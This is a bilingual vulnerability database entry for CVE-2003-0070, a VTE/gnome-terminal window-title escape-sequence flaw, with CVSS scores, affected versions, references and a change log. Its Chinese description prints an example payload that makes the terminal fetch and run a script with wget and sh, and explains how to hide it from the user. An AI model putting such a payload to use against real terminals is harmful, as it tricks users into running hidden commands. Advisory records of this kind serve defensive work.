CVE-2003-0070 (CNNVD-200303-004)

MEDIUM
中文标题:
Gnome-Terminal窗口标题转义序列命令执行漏洞
英文标题:
VTE, as used by default in gnome-terminal terminal emulator 2.2 and as an option in gnome-terminal 2...
CVSS分数: 6.8
发布时间: 2004-09-01 04:00:00
漏洞类型: 授权问题
状态: PUBLISHED
数据质量分数: 0.30
数据版本: v3
漏洞描述
中文描述:

转义序列(escape sequence)是一系列由ASCII转义字符(0x1B)开始的字符序列,并附带特殊的参数构成,转义序列一般原用于控制显示设备如终端,现在扩展在大多数操作系统中允许多种形式的交互。转义序列可以用于更改文本属性(颜色、宽度),移动鼠标位置,重配置键盘,更新窗口标题,或者操作打印机等。 Gnome-Terminal终端模拟器的窗口标题报告功能由于没有检查用户插入的转义字符,远程攻击者可以利用这个漏洞在终端窗口标题中插入任意转义序列字符而以执行用户权限执行任意命令。 多数终端模拟器支持使用转义序列通过SHELL来设置窗口标题,这个功能由DEC的DECterm中实现,已经移植在多数模拟器中,使用echo命令可以设置终端的窗口标题: $ echo -e "\e]2;This is the new window title\a" 当上面的命令显示在终端上的时候,它会设置窗口标题为上面的字符串,设置窗口标题本身没有安全问题,但是Gnome-Terminal提供转义序列来报告当前窗口标题,获得标题后直接放到命令行中执行。由于多数模拟器处理转义序列不能在窗口标题中嵌入回车符,因此要执行标题作为命令处理,需要用户交互按回车键,如下面的报告窗口标题的转义序列: $ echo -e "\e]2;;wget 127.0.0.1/.bd;sh .bd;exit;\a\e[21t\e]2;xterm\aPress Enter>\e[8m;" 当然这些标题没有人会去执行,但是通过设置标题为不可见字符,如前景后景全为一个颜色,在诱使用户处理窗口后,用户在不能看到标题的情况下而执行了恶意命令,有可能导致各种攻击,如开端口,发送敏感文件等操作。 需要注意的是Gnome-Terminal只有当由VTE组件实现时才有这个问题。

英文描述:

VTE, as used by default in gnome-terminal terminal emulator 2.2 and as an option in gnome-terminal 2.0, allows attackers to modify the window title via a certain character escape sequence and then insert it back to the command line in the user's terminal, e.g. when the user views a file containing the malicious sequence, which could allow the attacker to execute arbitrary commands.

CWE类型:
(暂无数据)
标签:
(暂无数据)
受影响产品
厂商 产品 版本 版本范围 平台 CPE
nalin_dahyabhai vte 0.11.21 - - cpe:2.3:a:nalin_dahyabhai:vte:0.11.21:*:*:*:*:*:*:*
nalin_dahyabhai vte 0.12.2 - - cpe:2.3:a:nalin_dahyabhai:vte:0.12.2:*:*:*:*:*:*:*
nalin_dahyabhai vte 0.14.2 - - cpe:2.3:a:nalin_dahyabhai:vte:0.14.2:*:*:*:*:*:*:*
nalin_dahyabhai vte 0.15.0 - - cpe:2.3:a:nalin_dahyabhai:vte:0.15.0:*:*:*:*:*:*:*
nalin_dahyabhai vte 0.16.14 - - cpe:2.3:a:nalin_dahyabhai:vte:0.16.14:*:*:*:*:*:*:*
nalin_dahyabhai vte 0.17.4 - - cpe:2.3:a:nalin_dahyabhai:vte:0.17.4:*:*:*:*:*:*:*
nalin_dahyabhai vte 0.20.5 - - cpe:2.3:a:nalin_dahyabhai:vte:0.20.5:*:*:*:*:*:*:*
nalin_dahyabhai vte 0.22.5 - - cpe:2.3:a:nalin_dahyabhai:vte:0.22.5:*:*:*:*:*:*:*
nalin_dahyabhai vte 0.24.3 - - cpe:2.3:a:nalin_dahyabhai:vte:0.24.3:*:*:*:*:*:*:*
nalin_dahyabhai vte 0.25.1 - - cpe:2.3:a:nalin_dahyabhai:vte:0.25.1:*:*:*:*:*:*:*
gnome gnome-terminal 2.0 - - cpe:2.3:a:gnome:gnome-terminal:2.0:*:*:*:*:*:*:*
gnome gnome-terminal 2.2 - - cpe:2.3:a:gnome:gnome-terminal:2.2:*:*:*:*:*:*:*
解决方案
中文解决方案:
(暂无数据)
英文解决方案:
(暂无数据)
临时解决方案:
(暂无数据)
参考链接
20030224 Terminal Emulator Security Issues mailing-list
cve.org
访问
RHSA-2003:053 vendor-advisory
cve.org
访问
terminal-emulator-window-title(11414) vdb-entry
cve.org
访问
20030224 Terminal Emulator Security Issues mailing-list
cve.org
访问
GLSA-200303-2 vendor-advisory
cve.org
访问
CVSS评分详情
6.8
MEDIUM
CVSS向量: AV:N/AC:M/Au:N/C:P/I:P/A:P
CVSS版本: 2.0
机密性
PARTIAL
完整性
PARTIAL
可用性
PARTIAL
时间信息
发布时间:
2004-09-01 04:00:00
修改时间:
2024-08-08 01:43:35
创建时间:
2025-11-11 15:32:18
更新时间:
2025-11-11 15:48:50
利用信息
暂无可利用代码信息
数据源详情
数据源 记录ID 版本 提取时间
CVE cve_CVE-2003-0070 2025-11-11 15:17:26 2025-11-11 07:32:18
NVD nvd_CVE-2003-0070 2025-11-11 14:50:37 2025-11-11 07:41:04
CNNVD cnnvd_CNNVD-200303-004 2025-11-11 15:08:42 2025-11-11 07:48:50
版本与语言
当前版本: v3
主要语言: EN
支持语言:
EN ZH
安全公告
暂无安全公告信息
变更历史
v3 CNNVD
2025-11-11 15:48:50
vulnerability_type: 未提取 → 授权问题; cnnvd_id: 未提取 → CNNVD-200303-004; data_sources: ['cve', 'nvd'] → ['cnnvd', 'cve', 'nvd']
查看详细变更
  • vulnerability_type: 未提取 -> 授权问题
  • cnnvd_id: 未提取 -> CNNVD-200303-004
  • data_sources: ['cve', 'nvd'] -> ['cnnvd', 'cve', 'nvd']
v2 NVD
2025-11-11 15:41:04
cvss_score: 未提取 → 6.8; cvss_vector: NOT_EXTRACTED → AV:N/AC:M/Au:N/C:P/I:P/A:P; cvss_version: NOT_EXTRACTED → 2.0; affected_products_count: 0 → 12; data_sources: ['cve'] → ['cve', 'nvd']
查看详细变更
  • cvss_score: 未提取 -> 6.8
  • cvss_vector: NOT_EXTRACTED -> AV:N/AC:M/Au:N/C:P/I:P/A:P
  • cvss_version: NOT_EXTRACTED -> 2.0
  • affected_products_count: 0 -> 12
  • data_sources: ['cve'] -> ['cve', 'nvd']